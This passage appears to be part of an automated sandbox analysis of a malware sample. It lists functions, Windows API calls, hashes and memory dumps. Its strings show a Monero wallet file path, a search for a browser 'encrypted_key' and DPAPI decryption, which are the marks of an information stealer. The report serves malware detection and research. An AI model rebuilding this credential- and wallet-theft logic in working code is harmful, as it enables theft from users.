                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 008AA743
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 5ce84c798e8b5063be2fdc2556f1e2a246f0f17e42e9fdc31f3bafa6d4b84089
                              • Instruction ID: 787b59fe31fa1b89e2f1b66dd5cacb5f82a68d23ae1f9e658e4f808d3abd339e
                              • Opcode Fuzzy Hash: 5ce84c798e8b5063be2fdc2556f1e2a246f0f17e42e9fdc31f3bafa6d4b84089
                              • Instruction Fuzzy Hash: D0E1D272810118AADB19EBA8DC95EEE7338FF14300F508169F516F65A1EF346A49CB63
                              Function 008AD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008B8B60: GetSystemTime.KERNEL32(008C0E1A,01429D18,008C05AE,?,?,008A13F9,?,0000001A,008C0E1A,00000000,?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008B8B86
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008AD481
                              • lstrlen.KERNEL32(00000000), ref: 008AD698
                              • lstrlen.KERNEL32(00000000), ref: 008AD6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 008AD72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: e525463cc157aad5704adbd47bf043d4afdc35766093f3bd1644ab4469e07271
                              • Instruction ID: fef5633289d01aa2e8342a7fbbd8b2e90755bcb468ebfa0647ffd17220de2b33
                              • Opcode Fuzzy Hash: e525463cc157aad5704adbd47bf043d4afdc35766093f3bd1644ab4469e07271
                              • Instruction Fuzzy Hash: C491D271910118AADB18EBA8DC95DEE7338FF14300F504169F517F65A1EF346A49CB63
                              Function 008AD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008B8B60: GetSystemTime.KERNEL32(008C0E1A,01429D18,008C05AE,?,?,008A13F9,?,0000001A,008C0E1A,00000000,?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008B8B86
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008AD801
                              • lstrlen.KERNEL32(00000000), ref: 008AD99F
                              • lstrlen.KERNEL32(00000000), ref: 008AD9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 008ADA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 357e664747db91c0eca1e9fc2ebe30bbf7cfd39149e9e194a8303ac2df402e9a
                              • Instruction ID: ec17dd6886e4e3e6ab18a573ad27262d9815e75d38dd93768981ca07108ab827
                              • Opcode Fuzzy Hash: 357e664747db91c0eca1e9fc2ebe30bbf7cfd39149e9e194a8303ac2df402e9a
                              • Instruction Fuzzy Hash: BF81D171910118AADB18FBA8DC95DEE7738FF54300F504528F516F66A1EF346A09CB63
                              Function 008B3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 453bf3b7855818723af038b0a7982670bd3ec814eee8a26175d31ea02e5307d7
                              • Instruction ID: 1c4fb92cdac34bfad4c1ca793281aa1c4ea37fc504cbe2e38acddc08ef65939f
                              • Opcode Fuzzy Hash: 453bf3b7855818723af038b0a7982670bd3ec814eee8a26175d31ea02e5307d7
                              • Instruction Fuzzy Hash: 4D412E75D10109EBCB08EFE4D895AEEB774FB54704F008418F416B6390DB75AA49DFA2
                              Function 008A9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008A99EC
                                • Part of subcall function 008A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008A9A11
                                • Part of subcall function 008A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008A9A31
                                • Part of subcall function 008A99C0: ReadFile.KERNEL32(000000FF,?,00000000,008A148F,00000000), ref: 008A9A5A
                                • Part of subcall function 008A99C0: LocalFree.KERNEL32(008A148F), ref: 008A9A90
                                • Part of subcall function 008A99C0: CloseHandle.KERNEL32(000000FF), ref: 008A9A9A
                                • Part of subcall function 008B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008B8E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 008A9D39
                                • Part of subcall function 008A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008A4EEE,00000000,00000000), ref: 008A9AEF
                                • Part of subcall function 008A9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,008A4EEE,00000000,?), ref: 008A9B01
                                • Part of subcall function 008A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008A4EEE,00000000,00000000), ref: 008A9B2A
                                • Part of subcall function 008A9AC0: LocalFree.KERNEL32(?,?,?,?,008A4EEE,00000000,?), ref: 008A9B3F
                                • Part of subcall function 008A9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 008A9B84
                                • Part of subcall function 008A9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 008A9BA3
                                • Part of subcall function 008A9B60: LocalFree.KERNEL32(?), ref: 008A9BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 89b083637296463fbd845a81486f92a7eaff9338ee3fa6fdf002b90a6322c3ec
                              • Instruction ID: 1fd7c7ece3d0614f2120f5c0f33add09aab84554790a6ca3ece30e1eb66c4950
                              • Opcode Fuzzy Hash: 89b083637296463fbd845a81486f92a7eaff9338ee3fa6fdf002b90a6322c3ec
                              • Instruction Fuzzy Hash: D6312CB6D10209ABDF04DBE8DC85AEEB7B8FB49304F144519E905E6241EB349A44CBA2
                              Function 008B92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(008B3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,008B3AEE,?), ref: 008B92FC
                              • GetFileSizeEx.KERNEL32(000000FF,008B3AEE), ref: 008B9319
                              • CloseHandle.KERNEL32(000000FF), ref: 008B9327
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: b3b27b2d191ec665ac7e2a5284bda1e1a1ad5caa617d76810be20afada62ddbd
                              • Instruction ID: 257585cc5a3dc288ab363ee6d8365f6af0b959f1f83dd4c9e0797a0ccddf6fd7
                              • Opcode Fuzzy Hash: b3b27b2d191ec665ac7e2a5284bda1e1a1ad5caa617d76810be20afada62ddbd
                              • Instruction Fuzzy Hash: 53F01975E44208ABDB10DBE4DC49B9E77F9EB58710F10C254F651EB3C0D670A6018B50
                              Function 008BC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 008BC74E
                                • Part of subcall function 008BBF9F: __amsg_exit.LIBCMT ref: 008BBFAF
                              • __getptd.LIBCMT ref: 008BC765
                              • __amsg_exit.LIBCMT ref: 008BC773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 008BC797
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 0e2e960b5c657c8a8a5577c7957f6f17b6e4df1655f732595367ffbadc3f75b7
                              • Instruction ID: 639d13119375a35f37d0bf2f2b25d1cfd001ad8f880e77a436d7ada6804f552e
                              • Opcode Fuzzy Hash: 0e2e960b5c657c8a8a5577c7957f6f17b6e4df1655f732595367ffbadc3f75b7
                              • Instruction Fuzzy Hash: 45F09A32901A149BD725BBBD9807BEA33A0FF00725F244149F455E63D2CFB499419E9B
                              Function 008B4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008B8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 008B4F7A
                              • lstrcat.KERNEL32(?,008C1070), ref: 008B4F97
                              • lstrcat.KERNEL32(?,01428920), ref: 008B4FAB
                              • lstrcat.KERNEL32(?,008C1074), ref: 008B4FBD
                                • Part of subcall function 008B4910: wsprintfA.USER32 ref: 008B492C
                                • Part of subcall function 008B4910: FindFirstFileA.KERNEL32(?,?), ref: 008B4943
                                • Part of subcall function 008B4910: StrCmpCA.SHLWAPI(?,008C0FDC), ref: 008B4971
                                • Part of subcall function 008B4910: StrCmpCA.SHLWAPI(?,008C0FE0), ref: 008B4987
                                • Part of subcall function 008B4910: FindNextFileA.KERNEL32(000000FF,?), ref: 008B4B7D
                                • Part of subcall function 008B4910: FindClose.KERNEL32(000000FF), ref: 008B4B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 845e5e2d0749df956da1afe3dcd25452c3b60b470586729fc2d7929e92da6afa
                              • Instruction ID: 51f208faec017282ee99a7be5998427d8b466d8a55b6483fb1fcb781be3eac9c
                              • Opcode Fuzzy Hash: 845e5e2d0749df956da1afe3dcd25452c3b60b470586729fc2d7929e92da6afa
                              • Instruction Fuzzy Hash: 7A219B7A900208A7DB54F7F4DC86EE9377CF764300F004558B659D6291EE74AAC9CBA3